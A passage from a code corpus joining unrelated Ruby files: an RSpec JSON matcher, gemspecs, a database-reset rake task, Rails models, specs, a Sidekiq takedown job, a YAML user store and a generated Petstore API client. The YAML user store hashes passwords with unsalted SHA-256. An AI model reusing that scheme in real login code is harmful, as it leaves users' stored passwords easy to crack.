# wrap to make be_json('foo' => matcher) work, too
unless expected == ANY || expected.respond_to?(:matches?)
@expected_matcher = match(expected)
end
@parse_opts = parse_opts
end
def matches?(json)
@actual = JSON.parse(json, **@parse_opts)
@expected_matcher == ANY || @expected_matcher === @actual
rescue JSON::ParserError => e
@parser_error = e
false
end
def does_not_match?(*args)
!matches?(*args)
end
def diffable?
true
end
def description
if @expected == ANY
'be a valid JSON string'
else
expected = @expected.respond_to?(:description) ? @expected.description : @expected
"be a valid JSON matching (#{expected})"
end
end
def failure_message
failed =
case
when @parser_error
"failed: #{@parser_error}"
when @expected != ANY
"was #{@actual}"
end
"expected value to #{description} but #{failed}"
end
def failure_message_when_negated
'expected value not to be parsed as JSON, but succeeded'
end
end
end
end
module RSpec
module Matchers
    # `be_json` checks if the provided value is JSON, and optionally checks its contents.
#
# If you need to check against some hashes, it is more convenient to use `be_json_sym`, which
# parses JSON with `symbolize_names: true`.
#
# @example
#
# expect('{}').to be_json # ok
# expect('garbage').to be_json
# # expected value to be a valid JSON string but failed: 765: unexpected token at 'garbage'
#
# expect('{"foo": "bar"}').to be_json('foo' => 'bar') # ok
# expect('{"foo": "bar"}').to be_json_sym(foo: 'bar') # more convenient
#
# expect('{"foo": [1, 2, 3]').to be_json_sym(foo: array_including(3)) # nested matchers work
# expect(something_large).to be_json_sym(include(meta: include(next_page: Integer)))
#
# @param expected Value or matcher to check JSON against. It should implement `#===` method,
# so all standard and custom RSpec matchers work.
def be_json(expected = Saharspec::Matchers::BeJson::ANY)
Saharspec::Matchers::BeJson.new(expected)
end
    # `be_json_sym` checks if the value is valid JSON and parses it with `symbolize_names: true`. This
    # way, it is convenient to check hash contents with Ruby's short symbolic-keys syntax.
    #
    # See {#be_json} for examples.
#
# @param expected Value or matcher to check JSON against. It should implement `#===` method,
# so all standard and custom RSpec matchers work.
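    #
    # @example
    #   # same check as the be_json example above, using symbol keys
    #   expect('{"foo": "bar"}').to be_json_sym(foo: 'bar')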
def be_json_sym(expected = Saharspec::Matchers::BeJson::ANY)
Saharspec::Matchers::BeJson.new(expected, symbolize_names: true)
end
end
end
| 30.59434 | 100 | 0.618871 |
6271afa3168b2048683bb76487507edac6319964 | 526 | Gem::Specification.new do |s|
s.name = "shibe"
s.version = "1.0.0"
s.summary = "very Cuba"
s.description = "Wow Shibe, Such Doge, very Cuba"
s.authors = ["elcuervo"]
s.licenses = ["MIT", "HUGWARE"]
s.email = ["yo@brunoaguirre.com"]
s.homepage = "http://github.com/elcuervo/shibe"
s.files = `git ls-files`.split("\n")
s.test_files = `git ls-files test`.split("\n")
s.add_dependency("cuba", "~> 3.1.0")
end
| 35.066667 | 58 | 0.505703 |
218fbffaadbabb8f962374bfd9f77d84df0bceec | 1,303 |
lib = File.expand_path("../lib", __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require "bitrix_webhook/version"
Gem::Specification.new do |spec|
spec.name = "bitrix_webhook"
spec.version = BitrixWebhook::VERSION
spec.authors = ["Serhii Danovskyi"]
spec.email = ["jipebed@gmail.com"]
spec.summary = "bitrix24 webhook rails"
spec.description = "bitrix24 webhook rails gem"
spec.homepage = "https://github.com/Serhii-Danovsky/bitrix_webhook"
spec.license = "MIT"
# Prevent pushing this gem to RubyGems.org. To allow pushes either set the 'allowed_push_host'
# to allow pushing to a single host or delete this section to allow pushing to any host.
if spec.respond_to?(:metadata)
spec.metadata["allowed_push_host"] = "https://rubygems.org"
else
raise "RubyGems 2.0 or newer is required to protect against " \
"public gem pushes."
end
spec.files = `git ls-files -z`.split("\x0").reject do |f|
f.match(%r{^(test|spec|features)/})
end
spec.bindir = "exe"
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ["lib"]
spec.add_development_dependency "bundler", "~> 1.16"
spec.add_development_dependency "rake", "~> 10.0"
end
| 36.194444 | 96 | 0.668457 |
38d1f1a4408d8652f4faa3f9a45de967d37923c7 | 431 | require 'datamappify/data/criteria/relational/concerns/find'
require 'datamappify/data/criteria/active_record/criteria_method'
module Datamappify
module Data
module Criteria
module ActiveRecord
class Find < CriteriaMethod
include Relational::Concerns::Find
private
def record
records_scope.where(criteria).first
end
end
end
end
end
end
| 20.52381 | 65 | 0.663573 |
b9089be7bb923552a695d6f6692dcd9ad12ff1f2 | 1,030 | namespace :db do
desc 'Erase all tables'
task :clear => :environment do
HostEnv.safe do
clear_database
end
end
desc 'Clear the database, run migrations and basic seeds (not users, teams, roles)'
task :reseed => :clear do
Rake::Task['db:structure_load'].invoke
Rake::Task['data:migrate'].invoke
end
task :structure_load => :environment do
structure_file = "#{Rails.root}/db/structure.sql"
command = "psql -d correspondence_platform_development < #{structure_file}"
system command
end
def clear_database
conn = ActiveRecord::Base.connection
tables = conn.tables
tables.each do |table|
puts "Deleting #{table}"
conn.drop_table(table, force: :cascade)
end
enum_types = %w(
assignment_type
attachment_type
requester_type
state
user_role
team_roles
cases_delivery_methods
search_query_type
)
enum_types.each do |type|
conn.execute("DROP TYPE IF EXISTS #{type}")
end
end
end
| 21.914894 | 85 | 0.659223 |
5d99c027a08481366da202a9d4bf4c2806a57117 | 420 | class Plan < ActiveRecord::Base
has_many :teams
validates_presence_of :name
validates_presence_of :max
validates_presence_of :price
validates_uniqueness_of :name
validates_length_of :name, :maximum => 255
validates_numericality_of :max, :less_than_or_equal_to => 65535
validates_numericality_of :price
def localize
self.name = I18n.t(self.class.name.downcase + '.' + self.name)
self
end
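  # Illustrative use (hypothetical i18n key such as "plan.basic" assumed to exist):
  #   Plan.new(name: 'basic').localize.name #=> the translated plan name for the current locale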
end
| 26.25 | 66 | 0.761905 |
08472c9aecafe17629a0438db6d8c012d45e603d | 909 | # frozen_string_literal: true
class TakedownJob
include Sidekiq::Worker
sidekiq_options queue: 'high_prio', lock: :until_executing, lock_args_method: :lock_args
def self.lock_args(args)
[args[0]]
end
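  # Illustrative enqueue (hypothetical arguments): the takedown id, the approving
  # user's id, and a deletion reason string, matching #perform below.
  #   TakedownJob.perform_async(takedown.id, approver.id, 'artist request')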
def perform(id, approver, del_reason)
@takedown = Takedown.find(id)
@approver = User.find(approver)
@takedown.approver_id = @approver.id
CurrentUser.as(@approver) do
ModAction.log(:takedown_process, {takedown_id: @takedown.id})
end
CurrentUser.as_system do
@takedown.status = @takedown.calculated_status
@takedown.save!
@takedown.actual_posts.find_each do |p|
if @takedown.should_delete(p.id)
next if p.is_deleted?
p.delete!("takedown ##{@takedown.id}: #{del_reason}", { force: true })
else
next unless p.is_deleted?
p.undelete!({ force: true })
end
end
end
end
end
| 25.971429 | 90 | 0.651265 |
391b121f385de9eb0a90dd9a70dd87eadb6feca4 | 1,696 | description 'YAML based user storage'
require 'yaml/store'
class YamlfileService < User::Service
def initialize(config)
FileUtils.mkpath(File.dirname(config[:store]))
@store = ::YAML::Store.new(config[:store])
end
# @override
def find(name)
@store.transaction(true) do |store|
user = store[name]
user && User.new(name, user['email'], user['groups'])
end
end
# @override
def authenticate(name, password)
@store.transaction(true) do |store|
user = store[name]
raise AuthenticationError, :wrong_user_or_pw.t if !user || user['password'] != crypt(password)
User.new(name, user['email'], user['groups'])
end
end
# @override
def signup(user, password)
@store.transaction do |store|
raise :user_already_exists.t(name: user.name) if store[user.name]
store[user.name] = {
'email' => user.email,
'password' => crypt(password),
'groups' => user.groups.to_a
}
end
end
# @override
def update(user)
@store.transaction do |store|
raise NameError, "User #{user.name} not found" if !store[user.name]
store[user.name]['email'] = user.email
store[user.name]['groups'] = user.groups.to_a
end
end
# @override
def change_password(user, oldpassword, password)
@store.transaction do |store|
check do |errors|
errors << 'User not found' if !store[user.name]
errors << :wrong_password.t if crypt(oldpassword) != store[user.name]['password']
end
store[user.name]['password'] = crypt(password)
end
end
private
def crypt(s)
s.blank? ? s : sha256(s)
end
end
User::Service.register :yamlfile, YamlfileService
| 25.313433 | 100 | 0.638561 |
3954906c00f4ee5aa4fd89f872c8bd19ea6cf837 | 904 | #
# Cookbook:: sbp_cloudmonkey
# Attribute:: default
#
# Copyright:: Schuberg Philis
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
default['sbp_cloudmonkey']['source'] = nil
default['sbp_cloudmonkey']['version'] = '6.1.0'
default['sbp_cloudmonkey']['binary'] = '/usr/local/bin/cmk'
default['sbp_cloudmonkey']['create_symlink'] = true
default['sbp_cloudmonkey']['link'] = '/usr/local/bin/cloudmonkey'
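# Illustrative override from a wrapper cookbook's attributes file (hypothetical value):
#   override['sbp_cloudmonkey']['version'] = '6.2.0'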
| 34.769231 | 74 | 0.742257 |
f82b2ec270d68c2dbbb7f157777f1f46860cf1e0 | 1,500 | class AuthorityDecorator < Draper::Decorator
delegate_all
def internal_position
I18n.t("authorities.positions.#{object.internal_position}")
end
def full_name
"#{object.person.surname}, #{object.person.name}"
end
def bloc_party
object.person.try :bloque
end
def edit_url
h.edit_authority_path object
end
def dni
object.person.cuit_or_dni || 'S/N'
end
def phone
object.person.phone || 'S/N'
end
def picture
    if object.person.picture.present?
      # Show the person's own picture when one is attached
      # (assumes `picture` resolves to an image path/URL accepted by image_tag).
      h.image_tag object.person.picture,
                  class: 'profile-user-img img-responsive img-circle',
                  alt: 'User profile picture'
else
h.image_tag h.image_path('no_image.jpg'),
class: 'profile-user-img img-responsive img-circle',
alt: 'User profile picture'
end
end
def assumption_date
object.assumption_date.to_default_s if object.assumption_date.present?
end
def recess_date
object.recess_date.to_default_s if object.recess_date.present?
end
def authority_positions
h.options_for_select(
[
['Presidente', :president],
['Vicepresidente Primero', :first_vicepresident],
['Vicepresidente Segundo', :second_vicepresident],
['Vicepresidente Tercero', :third_vicepresident],
['Prosecretario', :prosecutor],
['Secretario', :secretary],
], object.internal_position)
end
def authority_periods
Periodo.order(hasta: :desc).map { |period| [period, period.id] }
end
end
| 23.4375 | 74 | 0.682 |
6ae12db8f8e19330195491b6049c88078504ee11 | 495 | require "cronofy/version"
require "cronofy/errors"
require "cronofy/types"
require "cronofy/auth"
require "cronofy/client"
require "cronofy/response_parser"
require 'json'
module Cronofy
def self.api_url
@api_url ||= (ENV['CRONOFY_API_URL'] || "https://api.cronofy.com")
end
def self.api_url=(value)
@api_url = value
end
def self.app_url
@app_url ||= (ENV['CRONOFY_APP_URL'] || "https://app.cronofy.com")
end
def self.app_url=(value)
@app_url = value
end
end
| 19.038462 | 70 | 0.690909 |
089128dfb1e249f9a84335c63564bcb55162d521 | 14,794 | # frozen_string_literal: true
require 'rails_helper'
describe AssignmentsController, type: :request do
let(:slug_params) { 'Wikipedia_Fellows/Basket-weaving_fellows_(summer_2018)' }
let!(:course) { create(:course, id: 1, submitted: true, slug: slug_params) }
let!(:user) { create(:user) }
before do
stub_wiki_validation
course.campaigns << Campaign.first
allow_any_instance_of(ApplicationController).to receive(:current_user).and_return(user)
end
describe 'DELETE #destroy' do
context 'when the user owns the assignment' do
let(:assignment) do
create(:assignment, course_id: course.id, user_id: user.id,
article_title: 'Selfie', role: 0)
end
before do
expect_any_instance_of(WikiCourseEdits).to receive(:remove_assignment)
expect_any_instance_of(WikiCourseEdits).to receive(:update_assignments)
expect_any_instance_of(WikiCourseEdits).to receive(:update_course)
end
context 'when the assignment_id is provided' do
let(:params) { { course_slug: course.slug } }
before do
delete "/assignments/#{assignment.id}", params: { id: assignment.id }.merge(params)
end
it 'destroys the assignment' do
expect(Assignment.count).to eq(0)
end
it 'renders a json response' do
expect(response.body).to eq({ assignmentId: assignment.id }.to_json)
end
end
context 'when the assignment_id is not provided' do
let(:params) do
{ course_slug: course.slug, user_id: user.id,
article_title: assignment.article_title, role: assignment.role }
end
before do
delete "/assignments/#{assignment.id}", params: { id: 'undefined' }.merge(params)
end
# This happens when an assignment is deleted right after it has been created.
# The React frontend will not have an assignment_id until
# it gets refreshed from the server.
it 'deletes the assignment' do
expect(Assignment.count).to eq(0)
end
end
end
context 'when the user does not have permission do destroy the assignment' do
let(:assignment) { create(:assignment, course_id: course.id, user_id: user.id + 1) }
let(:params) { { course_slug: course.slug } }
before do
delete "/assignments/#{assignment.id}", params: { id: assignment }.merge(params)
end
it 'does not destroy the assignment' do
expect(Assignment.count).to eq(1)
end
it 'renders a 401 status' do
expect(response.status).to eq(401)
end
end
context 'when parameters for a non-existent assignment are provided' do
let(:assignment) { create(:assignment, course_id: course.id, user_id: user.id) }
let(:params) do
{ course_slug: course.slug, user_id: user.id + 1,
article_title: assignment.article_title, role: assignment.role }
end
before do
delete "/assignments/#{/undefined/}", params: { id: 'undefined' }.merge(params)
end
# This happens when an assignment is deleted right after it has been created.
      # The React frontend will not have an assignment_id until
# it gets refreshed from the server.
it 'renders a 404' do
expect(response.status).to eq(404)
end
end
end
describe 'POST #create' do
context 'when the user has permission to create the assignment' do
let(:course) do
create(:course, slug: 'Unasp/Teorias_da_Comunicaรงรฃo_(term_1)', submitted: true)
end
let(:assignment_params) do
        { user_id: user.id, course_slug: course.slug, title: 'jalapeño', role: 0, format: :json }
end
context 'when the article does not exist' do
it 'imports the article and associates it with the assignment' do
          expect(Article.find_by(title: 'Jalapeño')).to be_nil
VCR.use_cassette 'assignment_import' do
expect_any_instance_of(WikiCourseEdits).to receive(:update_assignments)
expect_any_instance_of(WikiCourseEdits).to receive(:update_course)
post '/assignments', params: assignment_params
assignment = assigns(:assignment)
expect(assignment).to be_a_kind_of(Assignment)
            expect(assignment.article.title).to eq('Jalapeño')
expect(assignment.article.namespace).to eq(Article::Namespaces::MAINSPACE)
expect(assignment.article.rating).not_to be_nil
expect(assignment.article.updated_at).not_to be_nil
end
end
end
context 'when the assignment is for Wiktionary' do
let!(:en_wiktionary) { create(:wiki, language: 'en', project: 'wiktionary') }
let(:wiktionary_params) do
{ user_id: user.id, course_slug: course.slug, title: 'selfie', role: 0,
language: 'en', project: 'wiktionary', format: :json }
end
it 'imports the article with a lower-case title' do
expect(Article.find_by(title: 'selfie')).to be_nil
VCR.use_cassette 'assignment_import' do
expect_any_instance_of(WikiCourseEdits).to receive(:update_assignments)
expect_any_instance_of(WikiCourseEdits).to receive(:update_course)
post '/assignments', params: wiktionary_params
assignment = assigns(:assignment)
expect(assignment).to be_a_kind_of(Assignment)
expect(assignment.article.title).to eq('selfie')
expect(assignment.article.namespace).to eq(Article::Namespaces::MAINSPACE)
end
end
end
context 'when the assignment is for Wikisource' do
let!(:www_wikisource) { create(:wiki, language: 'www', project: 'wikisource') }
let(:wikisource_params) do
{ user_id: user.id, course_slug: course.slug, title: 'Heyder Cansa', role: 0,
language: 'www', project: 'wikisource', format: :json }
end
before do
expect(Article.find_by(title: 'Heyder Cansa')).to be_nil
end
it 'imports the article' do
VCR.use_cassette 'assignment_import' do
expect_any_instance_of(WikiCourseEdits).to receive(:update_assignments)
expect_any_instance_of(WikiCourseEdits).to receive(:update_course)
post '/assignments', params: wikisource_params
assignment = assigns(:assignment)
expect(assignment).to be_a_kind_of(Assignment)
expect(assignment.article.title).to eq('Heyder_Cansa')
expect(assignment.article.namespace).to eq(Article::Namespaces::MAINSPACE)
end
end
end
context 'when the assignment is for Wikimedia incubator' do
let!(:wikimedia_incubator) { create(:wiki, language: 'incubator', project: 'wikimedia') }
let(:wikimedia_params) do
{ user_id: user.id, course_slug: course.slug, title: 'Wp/kiu/Heyder Cansa', role: 0,
language: 'incubator', project: 'wikimedia', format: :json }
end
before do
expect(Article.find_by(title: 'Wp/kiu/Heyder Cansa')).to be_nil
end
it 'imports the article' do
VCR.use_cassette 'assignment_import' do
expect_any_instance_of(WikiCourseEdits).to receive(:update_assignments)
expect_any_instance_of(WikiCourseEdits).to receive(:update_course)
post '/assignments', params: wikimedia_params
assignment = assigns(:assignment)
expect(assignment).to be_a_kind_of(Assignment)
expect(assignment.article.title).to eq('Wp/kiu/Heyder_Cansa')
expect(assignment.article.namespace).to eq(Article::Namespaces::MAINSPACE)
end
end
end
context 'when the article exists' do
before do
create(:article, title: 'Pizza', namespace: Article::Namespaces::MAINSPACE)
end
let(:assignment_params_with_language_and_project) do
{ user_id: user.id, course_slug: course.slug, title: 'pizza',
role: 0, language: 'es', project: 'wikibooks', format: :json }
end
before do
create(:article, title: 'Pizza', wiki_id: es_wikibooks.id,
namespace: Article::Namespaces::MAINSPACE)
end
let(:es_wikibooks) { create(:wiki, language: 'es', project: 'wikibooks') }
it 'sets assignments ivar with a default wiki' do
expect_any_instance_of(WikiCourseEdits).to receive(:update_assignments)
expect_any_instance_of(WikiCourseEdits).to receive(:update_course)
VCR.use_cassette 'assignment_import' do
post '/assignments', params: assignment_params
assignment = assigns(:assignment)
expect(assignment).to be_a_kind_of(Assignment)
expect(assignment.wiki.language).to eq('en')
expect(assignment.wiki.project).to eq('wikipedia')
end
end
it 'renders a json response' do
expect_any_instance_of(WikiCourseEdits).to receive(:update_assignments)
expect_any_instance_of(WikiCourseEdits).to receive(:update_course)
VCR.use_cassette 'assignment_import' do
post '/assignments', params: assignment_params
end
json_response = Oj.load(response.body)
# response makes created_at differ by milliseconds, which is weird,
# so test attrs that actually matter rather than whole record
expect(json_response['article_title'])
.to eq(Assignment.last.article_title)
expect(json_response['user_id']).to eq(Assignment.last.user_id)
expect(json_response['role']).to eq(Assignment.last.role)
end
it 'sets the wiki based on language and project params' do
expect_any_instance_of(WikiCourseEdits).to receive(:update_assignments)
expect_any_instance_of(WikiCourseEdits).to receive(:update_course)
post '/assignments', params: assignment_params_with_language_and_project
assignment = assigns(:assignment)
expect(assignment).to be_a_kind_of(Assignment)
expect(assignment.wiki_id).to eq(es_wikibooks.id)
end
end
end
context 'when the user does not have permission to create the assignment' do
let(:course) { create(:course) }
let(:assignment_params) do
{ user_id: user.id + 1, course_slug: course.slug, title: 'pizza', role: 0 }
end
before do
post '/assignments', params: assignment_params
end
it 'does not create the assignment' do
expect(Assignment.count).to eq(0)
end
it 'renders a 401 status' do
expect(response.status).to eq(401)
end
end
context 'when the wiki params are not valid' do
let(:course) { create(:course) }
let(:invalid_wiki_params) do
{ user_id: user.id, course_slug: course.slug, title: 'Pikachu', role: 0,
language: 'en', project: 'bulbapedia', format: :json }
end
let(:subject) do
post '/assignments', params: invalid_wiki_params
end
it 'returns a 404 error message' do
subject
expect(response.body).to include('Invalid assignment')
expect(response.status).to eq(404)
end
end
context 'when the same assignment already exists' do
let(:title) { 'My article' }
let!(:assignment) do
create(:assignment, course_id: course.id, user_id: user.id, role: 0, article_title: title)
end
let(:duplicate_assignment_params) do
{ user_id: user.id, course_slug: course.slug, title: title, role: 0, format: :json }
end
before do
VCR.use_cassette 'assignment_import' do
post '/assignments', params: duplicate_assignment_params
end
end
it 'renders an error message with the article title' do
expect(response.status).to eq(500)
expect(response.body).to include('My_article')
end
end
context 'when a case-variant of the assignment already exists' do
let(:title) { 'My article' }
let(:variant_title) { 'MY ARTICLE' }
let!(:assignment) do
create(:assignment, course_id: course.id, user_id: user.id, role: 0, article_title: title)
end
let(:case_variant_assignment_params) do
{ user_id: user.id, course_slug: course.slug, title: variant_title, role: 0, format: :json }
end
before do
expect_any_instance_of(WikiCourseEdits).to receive(:update_assignments)
expect_any_instance_of(WikiCourseEdits).to receive(:update_course)
VCR.use_cassette 'assignment_import' do
post '/assignments', params: case_variant_assignment_params
end
end
it 'creates the case-variant assignment' do
expect(response.status).to eq(200)
expect(Assignment.last.article_title).to eq('MY_ARTICLE')
end
end
end
describe 'PATCH #update' do
let(:assignment) { create(:assignment, course_id: course.id, role: 0) }
let(:request_params) do
{ course_id: course.id, id: assignment.id, user_id: user.id, format: :json }
end
context 'when the update succeeds' do
it 'renders a 200' do
put "/assignments/#{assignment.id}", params: request_params
expect(response.status).to eq(200)
end
end
context 'when the article is already assigned to a user' do
it 'renders a 409' do
assignment.update(user_id: 1)
put "/assignments/#{assignment.id}", params: request_params
expect(response.status).to eq(409)
end
end
context 'when the update fails' do
it 'renders a 500' do
allow_any_instance_of(Assignment).to receive(:save).and_return(false)
put "/assignments/#{assignment.id}", params: request_params
expect(response.status).to eq(500)
end
end
end
describe 'PATCH #update_status' do
let(:assignment) { create(:assignment, course: course, role: 0) }
let(:request_params) do
{ course_id: course.id, id: assignment.id, user_id: user.id, format: :json, status: status }
end
context 'when a status param is provided' do
let(:status) { 'in_progress' }
it 'renders a 200' do
patch "/assignments/#{assignment.id}/status", params: request_params
expect(response.status).to eq(200)
expect(assignment.reload.status).to eq(status)
end
end
context 'when no status param is provided' do
let(:status) { nil }
it 'renders a 422' do
patch "/assignments/#{assignment.id}/status", params: request_params
expect(response.status).to eq(422)
end
end
end
end
| 37.836317 | 100 | 0.645532 |
bf072ac49693e8c1ad6624b6761fb6e3a0568fa7 | 77 | # frozen_string_literal: true
module ProblemDetails
VERSION = '0.2.2'
end
| 12.833333 | 29 | 0.753247 |
28acf9ff86bbc4ed6a026cae63aa613f78cc05bc | 332 | class NotifyingCountryForm
include ActiveModel::Model
include ActiveModel::Attributes
include ActiveModel::Serialization
attribute :country, :string
validates :country, inclusion: { in: Country.notifying_countries.map(&:last) }
def self.from(investigation)
new(country: investigation.notifying_country)
end
end
| 23.714286 | 80 | 0.78012 |
08c0567b4ae3e1b1f0a8d019452c73b609e144c8 | 2,301 | require_relative '../model'
require_relative './review_submission_item'
module Spaceship
class ConnectAPI
class ReviewSubmission
include Spaceship::ConnectAPI::Model
attr_accessor :platform
attr_accessor :state
attr_accessor :submitted_date
attr_accessor :app_store_version_for_review
attr_accessor :items
attr_accessor :last_updated_by_actor
attr_accessor :submitted_by_actor
module ReviewSubmissionState
CANCELING = "CANCELING"
COMPLETE = "COMPLETE"
IN_REVIEW = "IN_REVIEW"
READY_FOR_REVIEW = "READY_FOR_REVIEW"
WAITING_FOR_REVIEW = "WAITING_FOR_REVIEW"
end
attr_mapping({
"platform" => "platform",
"state" => "state",
"submittedDate" => "submitted_date",
"appStoreVersionForReview" => "app_store_version_for_review",
"items" => "items",
"lastUpdatedByActor" => "last_updated_by_actor",
"submittedByActor" => "submitted_by_actor",
})
def self.type
return "reviewSubmissions"
end
#
# API
#
# appStoreVersionForReview,items,submittedByActor,lastUpdatedByActor
def self.get(client: nil, review_submission_id:, includes: nil)
client ||= Spaceship::ConnectAPI
resp = client.get_review_submission(review_submission_id: review_submission_id, includes: includes)
return resp.to_models.first
end
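      # Illustrative call (hypothetical id; includes string taken from the comment above):
      #   Spaceship::ConnectAPI::ReviewSubmission.get(
      #     review_submission_id: "12345678-aaaa-bbbb-cccc-123456789012",
      #     includes: "appStoreVersionForReview,items"
      #   )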
def submit_for_review(client: nil)
client ||= Spaceship::ConnectAPI
attributes = { submitted: true }
resp = client.patch_review_submission(review_submission_id: id, attributes: attributes)
return resp.to_models.first
end
def cancel_submission(client: nil)
client ||= Spaceship::ConnectAPI
attributes = { canceled: true }
resp = client.patch_review_submission(review_submission_id: id, attributes: attributes)
return resp.to_models.first
end
def add_app_store_version_to_review_items(client: nil, app_store_version_id:)
client ||= Spaceship::ConnectAPI
resp = client.post_review_submission_item(review_submission_id: id, app_store_version_id: app_store_version_id)
return resp.to_models.first
end
end
end
end
| 31.094595 | 119 | 0.677532 |
1cea1cd2f096c6835597c00f41dce4ff1e7bf179 | 1,094 | require 'test_helper'
class TopicsControllerTest < ActionDispatch::IntegrationTest
setup do
@topic = topics(:one)
end
test "should get index" do
get topics_url
assert_response :success
end
test "should get new" do
get new_topic_url
assert_response :success
end
test "should create topic" do
assert_difference('Topic.count') do
post topics_url, params: { topic: { about: @topic.about, title: @topic.title, user_id: @topic.user_id } }
end
assert_redirected_to topic_url(Topic.last)
end
test "should show topic" do
get topic_url(@topic)
assert_response :success
end
test "should get edit" do
get edit_topic_url(@topic)
assert_response :success
end
test "should update topic" do
patch topic_url(@topic), params: { topic: { about: @topic.about, title: @topic.title, user_id: @topic.user_id } }
assert_redirected_to topic_url(@topic)
end
test "should destroy topic" do
assert_difference('Topic.count', -1) do
delete topic_url(@topic)
end
assert_redirected_to topics_url
end
end
| 22.326531 | 117 | 0.698355 |
ffb504cc5732e618eeaa391b015f010ea642e923 | 404 | require 'spec_helper'
describe 'User visits the authentication log page' do
let(:user) { create(:user) }
before do
sign_in(user)
visit(audit_log_profile_path)
end
it 'shows correct menu item' do
expect(find('.sidebar-top-level-items > li.active')).to have_content('Authentication log')
expect(page).to have_selector('.sidebar-top-level-items > li.active', count: 1)
end
end
| 23.764706 | 94 | 0.707921 |
017121a1253087cada852517778b0ef2b98a4ba7 | 10,178 | =begin
#OpenAPI Petstore
#This spec is mainly for testing Petstore server and contains fake endpoints, models. Please do not use this for any other purpose. Special characters: \" \\
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
OpenAPI Generator version: 5.0.0-SNAPSHOT
=end
require 'cgi'
module Petstore
class StoreApi
attr_accessor :api_client
def initialize(api_client = ApiClient.default)
@api_client = api_client
end
# Delete purchase order by ID
# For valid response try integer IDs with value < 1000. Anything above 1000 or nonintegers will generate API errors
# @param order_id [String] ID of the order that needs to be deleted
# @param [Hash] opts the optional parameters
# @return [nil]
def delete_order(order_id, opts = {})
delete_order_with_http_info(order_id, opts)
nil
end
# Delete purchase order by ID
# For valid response try integer IDs with value < 1000. Anything above 1000 or nonintegers will generate API errors
# @param order_id [String] ID of the order that needs to be deleted
# @param [Hash] opts the optional parameters
# @return [Array<(nil, Integer, Hash)>] nil, response status code and response headers
def delete_order_with_http_info(order_id, opts = {})
if @api_client.config.debugging
@api_client.config.logger.debug 'Calling API: StoreApi.delete_order ...'
end
# verify the required parameter 'order_id' is set
if @api_client.config.client_side_validation && order_id.nil?
fail ArgumentError, "Missing the required parameter 'order_id' when calling StoreApi.delete_order"
end
# resource path
local_var_path = '/store/order/{order_id}'.sub('{' + 'order_id' + '}', CGI.escape(order_id.to_s).gsub('%2F', '/'))
# query parameters
query_params = opts[:query_params] || {}
# header parameters
header_params = opts[:header_params] || {}
# form parameters
form_params = opts[:form_params] || {}
# http body (model)
post_body = opts[:debug_body]
# return_type
return_type = opts[:debug_return_type]
# auth_names
auth_names = opts[:debug_auth_names] || []
new_options = opts.merge(
:header_params => header_params,
:query_params => query_params,
:form_params => form_params,
:body => post_body,
:auth_names => auth_names,
:return_type => return_type
)
data, status_code, headers = @api_client.call_api(:DELETE, local_var_path, new_options)
if @api_client.config.debugging
@api_client.config.logger.debug "API called: StoreApi#delete_order\nData: #{data.inspect}\nStatus code: #{status_code}\nHeaders: #{headers}"
end
return data, status_code, headers
end
# Returns pet inventories by status
# Returns a map of status codes to quantities
# @param [Hash] opts the optional parameters
# @return [Hash<String, Integer>]
def get_inventory(opts = {})
data, _status_code, _headers = get_inventory_with_http_info(opts)
data
end
# Returns pet inventories by status
# Returns a map of status codes to quantities
# @param [Hash] opts the optional parameters
# @return [Array<(Hash<String, Integer>, Integer, Hash)>] Hash<String, Integer> data, response status code and response headers
def get_inventory_with_http_info(opts = {})
if @api_client.config.debugging
@api_client.config.logger.debug 'Calling API: StoreApi.get_inventory ...'
end
# resource path
local_var_path = '/store/inventory'
# query parameters
query_params = opts[:query_params] || {}
# header parameters
header_params = opts[:header_params] || {}
# HTTP header 'Accept' (if needed)
header_params['Accept'] = @api_client.select_header_accept(['application/json'])
# form parameters
form_params = opts[:form_params] || {}
# http body (model)
post_body = opts[:debug_body]
# return_type
return_type = opts[:debug_return_type] || 'Hash<String, Integer>'
# auth_names
auth_names = opts[:debug_auth_names] || ['api_key']
new_options = opts.merge(
:header_params => header_params,
:query_params => query_params,
:form_params => form_params,
:body => post_body,
:auth_names => auth_names,
:return_type => return_type
)
data, status_code, headers = @api_client.call_api(:GET, local_var_path, new_options)
if @api_client.config.debugging
@api_client.config.logger.debug "API called: StoreApi#get_inventory\nData: #{data.inspect}\nStatus code: #{status_code}\nHeaders: #{headers}"
end
return data, status_code, headers
end
# Find purchase order by ID
# For valid response try integer IDs with value <= 5 or > 10. Other values will generated exceptions
# @param order_id [Integer] ID of pet that needs to be fetched
# @param [Hash] opts the optional parameters
# @return [Order]
def get_order_by_id(order_id, opts = {})
data, _status_code, _headers = get_order_by_id_with_http_info(order_id, opts)
data
end
# Find purchase order by ID
# For valid response try integer IDs with value <= 5 or > 10. Other values will generated exceptions
# @param order_id [Integer] ID of pet that needs to be fetched
# @param [Hash] opts the optional parameters
# @return [Array<(Order, Integer, Hash)>] Order data, response status code and response headers
def get_order_by_id_with_http_info(order_id, opts = {})
if @api_client.config.debugging
@api_client.config.logger.debug 'Calling API: StoreApi.get_order_by_id ...'
end
# verify the required parameter 'order_id' is set
if @api_client.config.client_side_validation && order_id.nil?
fail ArgumentError, "Missing the required parameter 'order_id' when calling StoreApi.get_order_by_id"
end
if @api_client.config.client_side_validation && order_id > 5
fail ArgumentError, 'invalid value for "order_id" when calling StoreApi.get_order_by_id, must be smaller than or equal to 5.'
end
if @api_client.config.client_side_validation && order_id < 1
fail ArgumentError, 'invalid value for "order_id" when calling StoreApi.get_order_by_id, must be greater than or equal to 1.'
end
# resource path
local_var_path = '/store/order/{order_id}'.sub('{' + 'order_id' + '}', CGI.escape(order_id.to_s).gsub('%2F', '/'))
# query parameters
query_params = opts[:query_params] || {}
# header parameters
header_params = opts[:header_params] || {}
# HTTP header 'Accept' (if needed)
header_params['Accept'] = @api_client.select_header_accept(['application/xml', 'application/json'])
# form parameters
form_params = opts[:form_params] || {}
# http body (model)
post_body = opts[:debug_body]
# return_type
return_type = opts[:debug_return_type] || 'Order'
# auth_names
